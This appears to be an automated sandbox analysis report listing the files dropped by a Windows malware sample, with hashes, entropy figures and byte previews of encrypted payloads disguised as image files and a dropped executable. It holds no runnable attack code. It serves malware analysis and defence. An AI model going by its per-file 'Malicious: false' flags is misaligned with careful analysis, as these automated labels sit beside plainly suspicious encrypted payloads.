Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\b[1].gif

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\c[1].gif

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\a[1].gif

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\s[1].dat

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.7115690393865535
Encrypted:	false
SSDEEP:	384:9vegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQr:E5F1FUdy422IK+gAZt2i0YPpQn4GMA
MD5:	711743729566E50108AEDF7B2949D90F
SHA1:	0532A4172B7911C2339BECE6F0057EB5B98973D0
SHA-256:	88B9CC2C2CDD70B5532D699F8750EA2F80DDA0EAE173A30F61E798A7CEF8DED2
SHA-512:	1DC0815BA923177DF620AB605602BFC4CB6502E1BAE8EBF28420969B0345FE3E95133F8686E290030A90601C4A45451DDC91133EDCECFC37088270977DEC6099
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\d[1].gif

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\f[1].dat

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].dat

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.186642107139491
Encrypted:	false
SSDEEP:	6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
MD5:	A1CC6E3DD3069453BEF8913F9698C666
SHA1:	2A3E6F584700A78F1C1691238F9673CBCA8084FD
SHA-256:	4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
SHA-512:	76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
Malicious:	false
Preview:	....l%00...X>?v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sffPPT.hi a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...[=<u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rggQQU.ih!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.9999387567935285
Encrypted:	true
SSDEEP:	98304:FAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:andLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	DE044C481A72F459A1FCB638B4E59263
SHA1:	5B49B9A644CC9AC381837E05FC86F0BA7020F728
SHA-256:	52A1541218DAB5A01C2B7F1C45B808807408A7D1F46185503B2A573BB2C00EF2
SHA-512:	DC9AA75D4282EA3120D5C3A36693765A1B187DF25839065B6F83F9B15AC8D820F237DC2D373DCB3D3D90578F8579DBF20792494248947988D9702C02A16BE1B7
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978936157803007
Encrypted:	false
SSDEEP:	192:5Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:5BuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	F6AC0866B12243EEE636C9A6ED87740B
SHA1:	99407FA0073BA660C1E1CE6889FC50D9F0F6E106
SHA-256:	F30A248C003183C43577BAD6A115F2929A9A2807B1F3FCF29DD12425BF731E38
SHA-512:	88F94EF8699FFDCCD5C873D0642402A78F272C34C7CFAF6914D8CF02442C8CECA1AB5EC73F88E08481E12DFA3AE1487146F377AA6F7286646DD6B0F9E1D85263
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\XY3LL0.exe

Download File

Process:	C:\Users\user\Desktop\2976587-987347589.08.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
